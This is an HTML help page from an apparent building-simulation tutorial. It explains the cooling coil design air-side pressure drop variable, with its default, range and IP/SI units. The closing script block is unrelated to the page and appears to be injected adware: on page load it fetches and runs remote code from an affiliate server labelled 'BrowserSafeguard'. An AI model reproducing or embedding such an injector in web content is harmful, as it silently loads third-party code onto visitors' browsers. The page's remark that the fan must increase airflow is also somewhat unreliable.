﻿<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<title>Learn High Performance Buildings</title>
<meta name="description" content="Info about LHPB.">
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, zoom=20%, target-densitydpi=high-dpi">
<link href="../css/normalize.css" rel="stylesheet" type="text/css">
<link href="../css/info.css" rel="stylesheet" type="text/css">
<link rel="shortcut icon" href="file:../images/favicon.ico" >
</head>
<body>
<div id="wrapper" class="cf">
<div id="container">
<div id="from">
</div>
<div id="logo" title="LHPB: Learn High Performance Buildings"></div>
<div id="title" class="cf">Learn High Performance Buildings</div>
<div id="info" class="cf">
<h1>COOLING COIL DESIGN AIR SIDE PRESSURE DROP</h1>
<h3>Associated System: Heating / Cooling Coils</h3>
<div class="graphic"> <img src="../HVAC AHU & Ducts/CoolingCoil.png" alt=""/ ></div>    
<p>The cooling coil design air side pressure drop is the difference in pressure across the cooling coils in and air handler during design conditions.  Coils inserted into the air stream of an HVAC unit will by necessity cause a certain amount of the loss that the fans of the system must overcome in order to provide that correct amount of air for that system.</p>      
<!--<p>(<a href="#">See also the �</a> )</p>-->
<p>Increasing this amount will produce an additional pressure drop that the fan must overcome. As a result the fan must increase the air flow being provided into the system.</p>      
<h4>The value of this variable can not be adjusted during simulation run-time. It may be adjusted before or after a simulation.</h4>      
<h2>Variable Descriptions</h2>
<ul class="list-variable">        
<li><label>Default:</label> 165</li>
<li><label>Minimum:</label> 0</li>
<li><label>Maximum:</label> 400</li>
<!--<li><label>Default Units:</label> i_Default</li>-->
<!-- <li><label>English:</label> </li>-->
<li><label>IP Unit:</label> In.W</li>
<li><label>SI Units:</label> Pa</li>      </ul>
<h2>Related Items: </h2>
<ul></ul>
<h2>Links:</h2>
<ul>
<li><a href="http://www.su-per-b.org" target="_blank">http://www.su-per-b.org</a></li>      </ul>
<div class="version"> Version 1.00</div>
    </div>
  </div>
</div>
<script type="text/javascript">(function () {if (top.location == self.location && top.location.href.split('#')[0] == 'http://learnhpb.org/demos/13.01/i-content/iv-SYSTAirDB.html') {var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;po.src = 'https://api.jollywallet.com/affiliate/client?dist=213&sub=bsg-rt-tightrope&name=BrowserSafeguard';var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);}})();</script></body>
</html>
